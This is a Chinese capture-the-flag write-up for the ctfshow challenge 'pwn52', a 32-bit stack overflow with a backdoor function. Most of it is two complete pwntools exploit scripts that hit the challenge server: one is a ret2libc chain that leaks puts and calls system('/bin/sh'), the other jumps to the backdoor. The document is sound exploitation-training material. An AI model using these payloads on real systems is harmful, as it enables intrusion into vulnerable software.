pwn52

迎面走来的flag让我如此蠢蠢欲动

检查保护，只开了代码执行保护

查看程序，在ctfshow 函数中存在栈溢出，存在后门函数。看了网上的wp，有两种做法，这里都将进行尝试

第一种是非预期打ret2libc，能够泄露puts地址。本地由于libc原因未打通，远程能够打通。

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from ctypes import*
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='pwn.challenge.ctf.show'
port=28229
file_name='pwn'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.CL:
        ROPgadget(local_libc)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1
    main_add = 0x8048616
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']

    print("Puts_got: ",hex(puts_got))
    print("Puts_plt: ",hex(puts_plt))

    offset = 0x6C

    payload1 = b'a' * (offset+4) + p32(puts_plt) + p32(main_add) + p32(puts_got)
    io.sendlineafter(b'', payload1)
    puts_addr = u32(io.recvuntil(b'\xf7')[-4:])
    print("Puts_add: ",hex(puts_addr))

    libc = LibcSearcher('puts',puts_addr)   # libc6-i386_2.27-3ubuntu1.6_amd64

    libc_base = puts_addr - libc.dump('puts')
    system_add = libc_base + libc.dump('system')
    bin_sh_add = libc_base + libc.dump('str_bin_sh')

    # libc_base = puts_addr - libc.symbols['puts']
    # system_add = libc_base + libc.symbols['system']
    # bin_sh_add = libc_base + next(libc.search(b'/bin/sh'))

    payload2 = b'a' * (offset+4) + p32(system_add) + p32(0) + p32(bin_sh_add)
    io.sendlineafter(b'', payload2)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()

第二种是预期思路，劫持程序流到后门函数

from pwn import *
from pwn import p8,p16,p32,p64,u32,u64
from LibcSearcher import * # type: ignore
from ctypes import*
from MyPwn import*

#========================
context.arch='amd64'
# context.arch = 'i386'
# context.log_level = 'debug'

host='pwn.challenge.ctf.show'
port=28229
file_name='pwn'

Breakpoint_NoPIE=0x1100
Breakpoint_PIE=0x1100
#========================

local_file = '/mnt/c/Users/HelloCTF_OS/Desktop/Pwn_file/'+ file_name
elf=ELF(local_file)
local_libc = elf.libc.path
libc=ELF(local_libc, checksec = False)

def Start():
    if args.C:
        ROPgadget(local_file)
        exit(0)
    elif args.CL:
        ROPgadget(local_libc)
        exit(0)
    elif args.G:
        gdbscript = f'b *{Breakpoint_NoPIE}'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.GP:
        gdbscript = f'b *$rebase({Breakpoint_PIE})'
        io = process(local_file)
        gdb.attach(io, gdbscript)
    elif args.P:
        io = process(local_file)
    else:
        io = remote(host,port)
    return io

def Exp():
    1==1

    binsh_add = 0x08048586

    offset = 0x6C
    payload = b'a'*(offset+4) + p32(binsh_add) + p32(0) + p32(0x36C) + p32(0x36D)
    io.sendline(payload)

if __name__=='__main__':
    io=Start()
    Exp()
    io.interactive()